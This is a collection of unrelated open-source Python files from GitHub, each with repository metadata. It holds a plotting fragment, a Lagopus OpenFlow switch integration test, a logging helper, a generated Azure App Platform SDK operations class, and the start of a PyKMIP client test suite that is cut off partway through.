ax = fig.add_subplot(gs[3])
ax.plot(grid_1D, true_1D, 'r--', label='Original Curve')
ax.plot(grid_1D, pred_1D, 'b-', label='Surrogate Model')
ax.plot(grid_1D, uncert_1D/np.max(uncert_1D), '-', color='orange', label='Uncertainty')
ax.plot(slice_samples_X[:, 0], slice_samples_Y, 'ko', label='Samples')
ax.set_xlim(xlim)
ax.legend(loc='upper left')
plt.show()
def _ax_plot3D(ax, X, Y, cmap):
n = int(math.sqrt(X.shape[0]))
ax.plot_surface(X[:, 0].reshape(n, n), X[:, 1].reshape(n, n), Y.reshape(n, n),
cmap=cmap, alpha=0.65, rstride=2, cstride=2, linewidth=0.01, antialiased=True)
ax.set_xlabel('x1', fontsize=15)
ax.set_ylabel('x2', fontsize=15)
ax.set_zlabel('y', fontsize=15)
| {
"content_hash": "51f1ff62d090ee3b83e43659d4ab4edc",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 116,
"avg_line_length": 39.159574468085104,
"alnum_prop": 0.6310785112741103,
"repo_name": "langhabel/optimization-surrogate-generalization",
"id": "f5d1b34e84f5a9cb6a8a1e98d91de80054023d41",
"size": "3681",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/demo_visualization.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "4025292"
},
{
"name": "Python",
"bytes": "30024"
}
],
"symlink_target": ""
} |
import os
import sys
import logging
from unittest import TestCase
from nose.tools import ok_, eq_
from checker import *
class OFPTest(TestCase):
def setUp(self):
# add cleanup func.
self.addCleanup(self.cleanups)
checker_setup(self)
self.opts = checker_get_opts(self)
# start
checker_start_lagopus(self)
checker_start_datastore(self)
self.setup_ds()
checker_start_ofp(self)
def cleanups(self):
# stop
checker_stop_ofp(self)
checker_stop_datastore(self)
checker_stop_lagopus(self)
checker_teardown(self)
def setup_ds(self):
e_res = '{"ret":"OK"}'
dpid = self.opts["switches"]["target"]["dpid"]
# TODO: type = ethernet-dpdk-phy
cmds = ["channel channel01 create -dst-addr 127.0.0.1 -protocol tcp",
"controller controller01 create -channel channel01",
"interface interface01 create -type ethernet-dpdk-phy "
"-port-number 0",
"interface interface02 create -type ethernet-dpdk-phy "
"-port-number 1",
"interface interface03 create -type ethernet-dpdk-phy "
"-port-number 2",
"port port01 create -interface interface01",
"port port02 create -interface interface02",
"port port03 create -interface interface03",
"bridge bridge01 create -controller controller01 "
"-port port01 1 -port port02 2 -port port03 3 -dpid 0x1",
"bridge bridge01 enable"]
for cmd in cmds:
datastore_checker_cmd(dpid, cmd, e_res)
def test_flow(self):
dpid = self.opts["switches"]["target"]["dpid"]
dp = ofp_checker_get_dp(dpid)
ofp = dp.ofproto
ofp_parser = dp.ofproto_parser
# send FlowMod.
match = ofp_parser.OFPMatch(in_port=1, eth_dst="ff:ff:ff:ff:ff:ff")
actions = [ofp_parser.OFPActionOutput(ofp.OFPP_NORMAL, 0)]
inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,
actions)]
sm = ofp_parser.OFPFlowMod(dp, cookie=0,
cookie_mask=0,
table_id=0,
command=ofp.OFPFC_ADD,
idle_timeout=0,
hard_timeout=0,
priority=10,
buffer_id=ofp.OFP_NO_BUFFER,
out_port=0,
out_group=0,
flags=0,
match=match,
instructions=inst)
sm = ofp_checker_send_msg(dpid, sm)
# send FlowStatsRequest.
sm = ofp_parser.OFPFlowStatsRequest(dp, flags=0,
table_id=ofp.OFPTT_ALL,
out_port=ofp.OFPP_ANY,
out_group=ofp.OFPG_ANY,
cookie=0,
cookie_mask=0,
match=match)
sm = ofp_checker_send_msg(dpid, sm)
# recv FlowStatsReply.
# create expected_msg.
st = ofp_parser.OFPFlowStats(table_id=0, duration_sec=0,
duration_nsec=0, priority=10,
idle_timeout=0, hard_timeout=0, flags=0,
cookie=0, packet_count=0, byte_count=0,
match=match, instructions=inst)
st.length = 96
st._set_targets(["length", "table_id", "priority",
"idle_timeout", "hard_timeout", "flags",
"cookie", "packet_count", "byte_count",
"match", "instructions"])
em = ofp_parser.OFPFlowStatsReply(dp, body=[st],
flags=0)
em.type = ofp.OFPMP_FLOW
em, rm = ofp_checker_recv_msg(dpid, em, None,
sm.xid, 112)
# send/rcv flow datastore cmd.
e_res = '''
{"ret":"OK",
"data":[{"name":":bridge01",
"tables":[{
"flows":[{
"actions":[{
"apply_actions":[{"output":"normal"}]}],
"cookie":0,
"dl_dst":"ff:ff:ff:ff:ff:ff",
"hard_timeout":0,
"idle_timeout":0,
"in_port":1,
"priority":10}],
"table":0}]}]}
'''
datastore_checker_cmd(0x01, "flow", e_res)
| {
"content_hash": "bd1dbbf3d91005c3068d440f85bd7951",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 77,
"avg_line_length": 38.28,
"alnum_prop": 0.46018808777429465,
"repo_name": "lagopus/lagopus",
"id": "59f60ec27937d0c17df3acddf622558b606ab8ad",
"size": "4785",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/integration_test/tools/sample_nose/test_ofp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "9818181"
},
{
"name": "C++",
"bytes": "59091"
},
{
"name": "Lex",
"bytes": "644"
},
{
"name": "M4",
"bytes": "19365"
},
{
"name": "Makefile",
"bytes": "45909"
},
{
"name": "Objective-C",
"bytes": "105221"
},
{
"name": "Python",
"bytes": "264408"
},
{
"name": "Ruby",
"bytes": "7077"
},
{
"name": "Shell",
"bytes": "364911"
},
{
"name": "Yacc",
"bytes": "3875"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
def log(logger):
"""
Example:
import plpacker
import tests.helpers
tests.helpers.log(plpacker.packager.LOGGER)
"""
import logging
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(levelname)s - %(name)s - %(message)s')
handler.setFormatter(formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
| {
"content_hash": "601016a071c105727c3654b2b260e071",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 75,
"avg_line_length": 25.523809523809526,
"alnum_prop": 0.6455223880597015,
"repo_name": "digitalrounin/py-lambda-packer",
"id": "3c1f4a83c155fce2b645e350af8c54b9bf70c7aa",
"size": "536",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "69536"
}
],
"symlink_target": ""
} |
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar, Union
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._apps_operations import build_create_or_update_request_initial, build_delete_request_initial, build_get_request, build_get_resource_upload_url_request, build_list_request, build_update_request_initial, build_validate_domain_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AppsOperations:
"""AppsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.appplatform.v2021_06_01_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get(
self,
resource_group_name: str,
service_name: str,
app_name: str,
sync_status: Optional[str] = None,
**kwargs: Any
) -> "_models.AppResource":
"""Get an App and its properties.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
        :param sync_status: Indicates whether to return the sync status of the App. Default value
         is None.
:type sync_status: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppResource, or the result of cls(response)
:rtype: ~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
sync_status=sync_status,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
service_name: str,
app_name: str,
app_resource: "_models.AppResource",
**kwargs: Any
) -> "_models.AppResource":
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(app_resource, 'AppResource')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
service_name: str,
app_name: str,
app_resource: "_models.AppResource",
**kwargs: Any
) -> AsyncLROPoller["_models.AppResource"]:
"""Create a new App or update an exiting App.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:param app_resource: Parameters for the create or update operation.
:type app_resource: ~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AppResource or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
app_resource=app_resource,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
service_name: str,
app_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
@distributed_trace_async
async def begin_delete( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
service_name: str,
app_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Operation to delete an App.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
service_name: str,
app_name: str,
app_resource: "_models.AppResource",
**kwargs: Any
) -> "_models.AppResource":
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(app_resource, 'AppResource')
request = build_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
service_name: str,
app_name: str,
app_resource: "_models.AppResource",
**kwargs: Any
) -> AsyncLROPoller["_models.AppResource"]:
"""Operation to update an exiting App.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:param app_resource: Parameters for the update operation.
:type app_resource: ~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AppResource or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
app_resource=app_resource,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
@distributed_trace
def list(
self,
resource_group_name: str,
service_name: str,
**kwargs: Any
) -> AsyncIterable["_models.AppResourceCollection"]:
"""Handles requests to list all resources in a Service.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppResourceCollection or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResourceCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResourceCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
api_version=api_version,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
api_version=api_version,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AppResourceCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps"} # type: ignore
@distributed_trace_async
async def get_resource_upload_url(
self,
resource_group_name: str,
service_name: str,
app_name: str,
**kwargs: Any
) -> "_models.ResourceUploadDefinition":
"""Get an resource upload URL for an App, which may be artifacts or source archive.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceUploadDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.appplatform.v2021_06_01_preview.models.ResourceUploadDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceUploadDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
request = build_get_resource_upload_url_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
template_url=self.get_resource_upload_url.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ResourceUploadDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_resource_upload_url.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}/getResourceUploadUrl"} # type: ignore
@distributed_trace_async
async def validate_domain(
self,
resource_group_name: str,
service_name: str,
app_name: str,
validate_payload: "_models.CustomDomainValidatePayload",
**kwargs: Any
) -> "_models.CustomDomainValidateResult":
"""Check the resource name is valid as well as not in use.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:param validate_payload: Custom domain payload to be validated.
:type validate_payload:
~azure.mgmt.appplatform.v2021_06_01_preview.models.CustomDomainValidatePayload
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CustomDomainValidateResult, or the result of cls(response)
:rtype: ~azure.mgmt.appplatform.v2021_06_01_preview.models.CustomDomainValidateResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CustomDomainValidateResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(validate_payload, 'CustomDomainValidatePayload')
request = build_validate_domain_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.validate_domain.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CustomDomainValidateResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
validate_domain.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}/validateDomain"} # type: ignore
| {
"content_hash": "dd3c939b8257a0989f387d87d3977a6e",
"timestamp": "",
"source": "github",
"line_count": 709,
"max_line_length": 250,
"avg_line_length": 45.21156558533145,
"alnum_prop": 0.6418655435969427,
"repo_name": "Azure/azure-sdk-for-python",
"id": "e4832b4a1e8d1e92d78f681ccb37c5fbb809b4d1",
"size": "32555",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/appplatform/azure-mgmt-appplatform/azure/mgmt/appplatform/v2021_06_01_preview/aio/operations/_apps_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import mock
import six
import ssl
import testtools
from kmip.core import attributes as attr
from kmip.core import enums
from kmip.core import objects as obj
from kmip.core.factories import attributes
from kmip.core.messages import contents
from kmip.services.kmip_client import KMIPProxy
from kmip.services import results
from kmip.pie.client import ProxyKmipClient
from kmip.pie.exceptions import ClientConnectionFailure
from kmip.pie.exceptions import ClientConnectionNotOpen
from kmip.pie.exceptions import KmipOperationFailure
from kmip.pie import factory
from kmip.pie import objects
class TestProxyKmipClient(testtools.TestCase):
"""
Test suite for the ProxyKmipClient.
"""
def setUp(self):
super(TestProxyKmipClient, self).setUp()
self.attribute_factory = attributes.AttributeFactory()
def tearDown(self):
super(TestProxyKmipClient, self).tearDown()
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_init(self):
"""
Test that a ProxyKmipClient can be constructed with valid arguments.
"""
ProxyKmipClient(
hostname='127.0.0.1',
port=5696,
cert='/example/path/to/cert',
key='/example/path/to/key',
ca='/example/path/to/ca',
ssl_version=ssl.PROTOCOL_TLSv1,
username='username',
password='password',
config='test')
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_open(self):
"""
Test that the client can open a connection.
"""
client = ProxyKmipClient()
client.open()
client.proxy.open.assert_called_with()
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_open_on_open(self):
"""
Test that a ClientConnectionFailure exception is raised when trying
